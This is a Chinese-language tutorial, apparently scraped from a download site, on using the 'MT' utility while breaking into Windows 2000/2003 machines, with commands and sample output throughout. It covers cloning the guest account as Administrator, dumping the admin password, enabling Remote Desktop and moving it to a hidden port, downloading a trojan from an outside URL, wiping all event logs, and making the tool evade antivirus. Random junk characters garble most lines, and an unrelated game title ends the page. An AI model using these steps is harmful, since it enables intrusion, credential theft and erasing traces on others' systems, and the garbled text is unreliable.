软件简介:
9 D' d! u1 r2 i ~ 今天来讲一下MT的详细用法,MT只有40几K,担功能却是非常强大的.很多时候在入
$ g c% ]* t- {3 w5 r侵时用款小工具能帮忙我们解决很多问题...现在就来详细的讲解一下mt具体应' b& n; P' o8 v' h, U3 ^
用..
$ H* |5 {" w' n) {+ ~0 u1.mt -sysinfo 查看机器配置
! X- h# _5 X z4 q先来看一下..看到没??这里就会列举出来本机的各种配置信息....看下面.这里面列举了现在系统打过的补丁,这里显示了本机硬件的配置..CPU等..这里显示了本机IP地址,子网,和网关...% y! [6 I% M! ^. ~2 w, P* J+ A
2.type c:\boot.in 查看启动文件: d/ g; p) Y2 o+ o5 k
这主要是调 用了c:\boot.i 这个文件,就是开机的双启动菜单,通过它来查看本机用的是什么系统.这里多说一个.. VER功能和它也是一样的.它是系统命令../ d5 E: y2 t0 r& l+ \* r
[boot loader]
' Z; a; g" M1 `: E. Ptimeout=30' v( R3 n& L0 X/ k. d1 \
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
* h5 V% I) L$ B: h[operating systems]. O+ F1 g( y' S% M1 z( G M- f( R
multi(0)disk(0)rdisk(0)partition(1)\WINNT=Microsoft Windows 2000 Server /fastd$ s- K; v3 O& t# [7 g' J" e
etect6 m$ ~" e8 P* K& o8 e* X$ D
C:\ver" g* v: e+ F) w6 h
Microsoft Windows 2000 [Version 5.00.2195]8 _) N/ k" V. x
看到了吧?2000的系统..' L9 ^, [' V2 A) j
3.mt -clone Administrator guest 意思是把guest克隆为管理员(必需是系统权
/ I, y6 g) X6 s- L: W2 d% v0 T5 Q8 D$ @限才能运行)! e8 c8 y6 {6 I, O1 R% h
( f& B+ E( B/ G7 x
4.mt -chkuser 查看自己机器里是否有克隆的帐户. U: B' u$ o, F1 e4 X5 S& B% `5 P
用它也可以来查看自己的机器是否被人克隆了帐户..
# r) X d* c/ [2 o. n看到了吧..
' c+ j; `6 b) H& i$ a' f5 T) P5 D5 G* M6 ?: a( \: I
5.mt -findpass 查看管理员密码(仅2000/2003)6 Z6 J1 a ~: g# h& n
这个功能和一个findpass的功能是一样的.# O) q" r6 k: w8 Z8 y
" u' e5 y% {# [C:\mt -findpass: k) F% m9 ?, \& Y' `6 R) D
The logon information :5 t# x: S. a5 J5 s
Domain : 77AFCF2E775047B9 c' F4 j0 t6 O: }) S* R' R3 c& Z* Z
Username : Administrator
- Q0 I( a8 @; F Password : 1235 l& k6 L f5 J+ ^& @( O
看到了吧?我系统的密码就是123" ~+ s# J) [. N6 w% Q
6.mt -pslist 查看进程# Q' C, o& t+ {/ Q# h6 M$ J
此功能是在DOS下显示主机现在正在运行的程序.如果是在XP下
- ?, s- o8 X2 {. | f' Z我们就可以直接用tasklist 就可以了...担在2000下不技术
2 U7 |/ i* r/ J! Z# i4 T& ^就这样子..看到了吧?# {5 l( R7 |; R: l
再试个..7 R; a9 B/ Q1 V) Z$ x; Y+ W
关它..
/ j/ T- D( V3 a0 q& ^7.mt -pskill 杀除进程
" l4 J, E% q$ E7 g$ L7 @些功能就是杀掉某个进程,这里我们可以试一下.
$ `2 z. A* _/ |& y w# a8 q现在我们来关掉932这个进程..; y0 a/ F% ?+ R \1 K+ X5 Q0 a
C:\mt -pskill 772
" \1 _% D w/ a! l4 k _Kill process sccuessful!
0 M" H4 f- W- p: G已经关掉了..; a& S5 e2 U T [9 H
8.mt -setupts 安装终端服务(仅2000/2003好用)
% [; e$ }5 _) [8 s$ B这里说明下,我们平时我们在入侵2000的机器时有时开不了3389,那是因为只有2000服务器版的系统才能开3389,如果不是服务器版的,是开不了3389的,这也是有很多人不问为什么就一直开3389而打不开的原因..
1 k0 F! Z; ^0 x, b8 Q, e我虚拟机不是服务器的,所以打不开..就是这意思..
) N; a. e( ]: y9.mt -chgtsp 1030 改终端端口6 |( C+ w. [, d/ B1 [/ s
当我们开了对方机子3389后,主人很容易会发现开放,那我们可以把3389的端口给改这样只有我们自己去用它...
; m4 g! S0 D$ m8 e, P7 G1030 这个改成你想要的端口..
% |2 m0 J: T# r0 j10.mt -reboot 重启) I1 k7 h) `# k. H" [6 l) a
不带有任何提示,直接重启....一会我试下..
/ S% F( y# W4 `4 k' \2 S- A11.mt -netget http://或者ftp://www.你木马的地址 c:\1.exe 下载木马
! P6 W& b8 }! S* P4 ~# M0 B) y# r功能和vget是一样的,我们来试下..
4 i6 V" K7 ], p2 l( h/ f; y' uFail to open registy key...
/ r$ ~ X9 N e0 n! ^9 JC:\mt -netget http://user.free2.77169.net/didiaoyin/mm.exe c:\mm.exe J3 I* }" L- p7 h
Download File from http://user.free2.77169.net/didiaoyin/mm.exe to c:\! [5 j6 P0 X0 j( w. A8 [+ I
Download completed 290817 bytes ......
# p" W# n( Z+ B/ u: L8 m; BDownloaded 284.0KB @94.7KB/S in 2sec. S R; L8 l$ l9 y. [' @
File c:\mm.exe TotalByte : 284 KB.
+ H: B5 l+ ~5 p/ N6 ]看到了吧?现在来看一下..我的鸽子...
: q" o+ R6 _! h% @) C12.mt -clog all 删除所有应用程序,系统,日志等
& C! U. u( y, A2 v' Y( s9 S+ E这个都明白吧...
# }9 _1 r/ R) xC:\mt -clog all5 B! H5 Y- |5 L, U' c. C
Clean EventLog : Application successful!' u+ V! `( V- ~& L( [+ w' t; d2 c
Clean EventLog : Security successful!
( R- V$ v$ b3 I [Clean EventLog : System successful!& V# @# d- A/ Q2 V5 n, a
这样就把日志都删除了...3 \: L' u" ?! e1 z( H: s
13.mt -dlllist 列出进程DLL) ?9 c" \2 Q% s r
格式是mt -dlllist 进程号
0 R8 N* p) L, z8 ~9 X8 n这样就可以把对应进程号的进程显示出所有的DLL文件; ~5 z4 {' x7 d1 {0 H5 \
这个在我们查马时很有用..
2 o& B# o2 z* ?6 ^9 x$ H# I此功能目的是列出进程的DLL文件,我们来看下..4 [5 M3 |- U; `9 x, Y0 j4 y, ^
14.mt -poweroff 关掉电源。
8 F+ ~3 g& p: w3 c9 @% ~0 |没什么好说的,直接关机..
, t- e5 r. I; ?- Y/ r* h" B% j15.mt -logoff 注销' u- B% r! K" }5 r! c# I H
直接注销.4 H2 R% F* ]0 T% A0 @) q' U5 V* P/ k' V
16.mt -shutdown 关机(都不会有任何提示). q- m% d0 k/ ?
关机.. L, R* o" J, Y, T4 ?; l
17.mt -chkts 检查终端信息- F6 Y+ b0 l9 U( }* e2 v) I
没有.' h/ k; V: v0 W! m5 [9 l+ g ]- _
18.mt -remts 卸载终端服务
5 Q S" B5 s7 I1 U) T! |6 [- ]这个就和刚才的那个8.mt -setupts 是对应的,卸载终端...; @% Y) D( ]1 K1 R! ~
http://user.free2.77169.net/didiaoyin/mm.exe
$ T# @/ X! [. u: `) m I1 Y/ P$ _( V, F: k& ]& Q/ I! Y
好了,MT的基本用法就这么多,功能还是很多的...担是现在杀软都杀它..我们要自己做免杀...- a! _/ K8 H8 v2 B. F
现在来试下mt -logoff 这个吧,注销,看下效果..关机也是一样的..0 c/ R0 l( z' e
看到了吧?不会有任何提示,直接关...
* z* q7 z! G2 \好了,今天教程就到这里了..0 H2 X+ Z. l% _" l6 w
再见..." C6 v& k7 r/ z G
下载地址:
|
最新整理Linux手工服务端_末世策略塔防手游
